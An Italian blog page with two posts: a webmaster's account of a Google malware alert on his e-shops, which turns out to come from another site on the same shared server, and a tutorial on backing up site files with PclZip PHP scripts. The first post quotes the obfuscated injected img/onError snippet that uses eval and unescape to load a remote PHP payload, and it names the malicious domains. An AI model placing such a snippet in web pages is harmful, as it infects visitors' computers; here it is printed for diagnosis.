C’è qualcosa che non va.. guardando sui webmaster tools di Google vedo che su un sito mi segnala una pagina contenente questo codice:

Purtroppo Google ha trovato codice dannoso sul tuo sito.

< img src=”about:blank” onError=’astro=unescape(“%27″);astru=
unescape(“%22″);sksa=eval(“document.getElementById(“+astro+”
seaid”+astro+”).src=unescape(“+astro+”%68%74%74%70%3A%2F%2F”
+astro+”)+document.getElementById(“+astro+”5550″+astro+”).id
+unescape(“+astro+”%2E%69%6E%2F”+astro+”)+”+astro+”129091371
2″+astro+”+unescape(“+astro+”%2E%70%68%70″+astro+”)”);docume
nt.getElementById(“seaid”).src=sksa’ style=”width:300;height
:300;border:0px;” >

mentre sul secondo sito mi dice che è tutto ok.

Facendo qualche ricerca trovo che questo codice è proprio la codifica di un url solitamente composto cosi xxxxx.in/xxxx.php che contiene codice malevolo e fa aprire 2 pdf infetti. Leggo inoltre che ha colpito molti blog su base wordpress.

Per caso ne hai sentito parlare?

Io nei miei due negozi online, creati con cms diversi (zen-cart e virtuemart) non riesco a trovare questo codice, inoltre ho guardato le date di ultima modifica dei file per capire se qualcuno avesse iniettato codice malevolo e non c’è niente di recente. Ho cercato veramente a fondo leggendo tutti i casi e cercando file dopo file eventuali stringhe nascoste, iframe o script, htaccess e file config,  ma niente! E’ tutto in ordine e pulito..

A me personalmente non è mai apparso niente navigandoci e comunque Google non da l’avviso di “sito che può danneggiare il tuo computer”; non so più dove guardare o cosa fare. Credo ci sia qualcosa, perchè avendo ricevuto segnalazioni diverse ho scartato l’idea di un falso positivo o di un problema sul pc con cui si naviga.

Hai qualche consiglio da darmi? esperienze simili? aiuti su dove potrebbe esserci un buco?

I due negozi sono bigiotteria e cosmetici la versione dei cms è piuttosto datata lo so, però sono le versioni stabili con relative patch; non le ho ancora aggiornate in quanto sono gli ultimi mesi di vita, presto lasceranno il posto ad un negozio tutto nuovo.

Per il momento non mi resta che aspettare l’aggiornamento dei dati in strumenti per webmaster di Google per vedere se lo ritrova.

Ogni consiglio sarà veramente di aiuto, grazie!

P.S.: Ho un buono adwords da 75 euro in più Potrebbe essere un regalo per chi risolve il caso

P.P.S.: Visitando i siti ricevete un allarme dal vostro antivirus? (se loa vete ovviamente)

UPDATE: Ancora oggi sono in alto mare.. ho potuto testarlo di persona; dopo il tad di chiusura </html> appare il codice postato sopra, richiama un file php che carica delle classi java, fa scaricare dei file pdf e fa partire il media player di windows. Un disastro insomma.

Vedo che il sito dannoso è 3737373.in o in-in.in, trattasi di Un Trojan-Downlaoder.java.openconnection.bu e un trojan Packed.Win32.Krap.ao

UPDATE RISOLUTIVO: Bene, trovata la soluzione. Il codice maligno non riuscivo a scovarlo semplicemente perchè non c’era. -.- Mi ha risposto il provider dicendo che han risolto; un sito ospitato sul mio stesso server stava infettando tutti gli altri.

Bene, anno nuovo server nuovo, passo ad un dedicato

Articoli Correlati:

1. Backup del Tuo Blog e Sito in Meno di 2 Minuti con Php
2. Dreamweaver Aggiunge Righe Vuote nel Codice Html
3. Motore di Ricerca di Codice Open Source

Salvataggio Veloce delle Tue Pagine

Esegui regolarmente il backup dei tuoi siti, blog e il vario materiale che tieni on-line? No? Male! Ma non sei sicuramente l’unico, ci sono anche io.

Però è veramente importante salvare tutte le proprie pagine web, tutti i nostri lavori e progetti, giorno dopo giorno per evitare catastrofi di cui pentirci. E’ talmente importante quanto noioso e lento come processo.

O meglio, quando andiamo a fare un backup dei nostri databases, ci basta un dump attraverso php o uno dei tanti software disponibili, oppure con un semplice esporta da phpmyadmin, o da qualche plugins per wordpress; insomma in pochi click e pochissimo tempo possiamo salvare sul nostro pc una copia dei vari databases.

Ma per fare un backup completo di tutti i files del nostro sito/blog? Quanto tempo ci vuole?

Se abbiamo un sito vetrina  di poche pagine con qualche foto, allora riusciamo a scaricarlo interamente in un tempo ragionevole, ma se invece nel nostro hosting abbiamo caricato un cms bello corposo? un blog, un e-commerce, un portale il tutto contornato da anni di fotografie e file vari?

In questo caso il tempo per avere una copia completa sarà molto più elevato, sia per il maggior numero di files, sia per la dimensione del progetto; ed è proprio per questo che i backup dei files vengono fatti con minor frequenza e non regolarmente rispetto ai backup dei databases.

Proprio pochi giorni fà nell’occasione dell’aggiornamento di wordpress, faccio un backup mysql da phpmyadmin e poi procedo; prima di cliccare su aggiorna vedo le scritte che avvisano di fare un bel backup del database e dei files, ci rifletto un pò e poi continuo, non avevo voglia di aspettare. Fatalità l’aggiornamento in un primo momento restituiva errore rendendo il blog inaccessibile.. ormai mettermi a piangere in un angolino non serviva più; poi per fortuna è ripartito senza problemi… e indovina un po’? ho fatto subito un backup completo!

Quella è stata l’ultima volta che ho rischiato, da lì in poi sempre backup di tutto. In ogni caso aspettare decine e decine di minuti non mi andava e quindi ho pensato e trovato una soluzione molto comoda.

Come fare un backup dei file del nostro sito o blog in meno di due minuti?

La lentezza è data soprattutto dalla quantità di files, grandi o piccoli che siano; per capirci, scaricare 1 file da 100 Mb impiega meno tempo che scaricare 100 files da 1 Mb, anche se alla fine, sempre 100 Mb sono.

Quindi se prepariamo un archivio contenente tutti i nostri files direttamente nel server hosting, dovremo scaricare solo un singolo file, diminuendo cosi drasticamente il tempo dell’operazione.

Vediamo come fare: il tutto è possibile grazie alla libreria PCLZIP di Php prelevabile dal sito phpconcept.net, con la quale possiamo manipolare gli archivi zip.

Poi dobbiamo preparare un file php che utilizza questa libreria per creare l’archivio e un altro file per estrarlo, in caso di ripristino.

Per la creazione dell’archivio vediamo questo minimale script backup.php:

<?php
include_once (‘pclzip.lib.php’);
$archive = new PclZip(‘./backup_’.date(‘d-m-y’).’.zip’);
$v_list = $archive->create(realpath(dirname(__FILE__)));
if ($v_list == 0) {
die(“Error : “.$archive->errorInfo(true));
}
else echo “Archivio creato con successo!”;
?>

il file dovrà essere nella stessa posizione della libreria pclzip.lib.php, in caso contrario basterà aggiornare il percorso dell’include.

Nella seconda riga possiamo modificare dove verrà creato il file e con che nome, nell’esempio verrà creato nella stessa posizione del file backup.php e con il nome backup_datacreazione.zip. Potete metterlo in una sottocartella e aggiungerci altre info attraverso le variabili php, personalizzabile a piacimento.

Nella terza riga scegliamo quali cartelle e files vogliamo inserire nell’archivio. Nell’esempio qui sopra, con la variabile “realpath(dirname(__FILE__))” indichiamo tutti i file e cartelle presenti nella root del vostro hosting; basterebbe un semplice “./” ma non viene accettato, come potete vedere su phpconcept.net è un problema noto.

Un esempio diverso: per salvare la cartella blog useremo:

$v_list = $archive->create(‘/blog’);

Se tutto va a buon fine verrà visualizzato il messaggio “Archivio creato con successo” o restituirà l’errore in caso contrario.

Per estrarre l’archivio in caso di ripristino utilizziamo restore.php:

<?php
require_once(‘pclzip.lib.php’);
$archive = new PclZip(‘backup.zip’);
if ($archive->extract() == 0) {
die(“Errore : “.$archive->errorInfo(true));
}
else echo “Archivio Estratto con successo!”;
?>

Qui dobbiamo modificare solo la seconda riga con il nome corretto del file zip che abbiamo creato prima attraverso lo script backup.php. Eseguendo lo script verranno estratti tutti i file e cartelle nella stessa posizione del file restore.php.

Per sicurezza è meglio rinominare questi files con un nome più complicato di backup.php e restore.php o magari proteggerli con una password, in modo da evitare di far lavorare i malintenzionati.

Lo stesso vale per il nome del file zip, mettiamolo in una sottocartella e diamogli un nome particolare e ricordiamoci di cancellarlo una volta scaricato, cosi evitiamo ogni tipo di rischio.

Potete Scaricare i 2 files pronti e la libreria che ho usato io:
Script e Libreria (Zip da36 Kb).

Una volta settate le variabili e salvati i link ai due script nei preferiti, abbiamo un semplice sistema di salvataggio delle nostre pagine; in un click si avvia il backup  e poi si scarica il file zip a banda piena.

Ecco come salvare le pagine del Tuo Blog o Sito in Meno di 2 Minuti.

Lo script di backup è minimale, infatti richiama solo la funzione del pclzip, ma con il php si possono fare molte cose interessanti. Ad esempio si potrebbero aggiungere molti controlli, come l’esistenza di un archivio vecchio, la richiesta di sovrascrivere o meno il file e cosi via.

Inoltre si può aggiungere che restituisca oltre al messaggio di successo anche il link diretto per il download del file zip. Insomma si può creare un vero e proprio sistema di salvataggio.

Io ad esempio ho un server linux casalingo che ogni mattina attraverso cron esegue uno script che fa il dump di tutti i miei databases residenti nei vari hosting; adesso ci aggiungerò anche un richiamo allo script di backup cosi viene creato lo zip e poi lo faccio scaricare attraverso wget.

Cosi ogni giorno ho il backup sia dei databases sia di tutti i files.

Articoli Correlati:

1. Backup e Sincronizzazione File per Accedere da Pc Diversi, Gratis!
2. [RISOLTO] Sito Infetto Da Malware: Dove?
3. Come Copiare un Dvd o Parti di Video con Vlc
4. Mozilla Thunderbird File di Posta Enormi Anche Senza Messaggi
5. Servizio di File-hosting Illimitato e Gratuito per 1 Giorno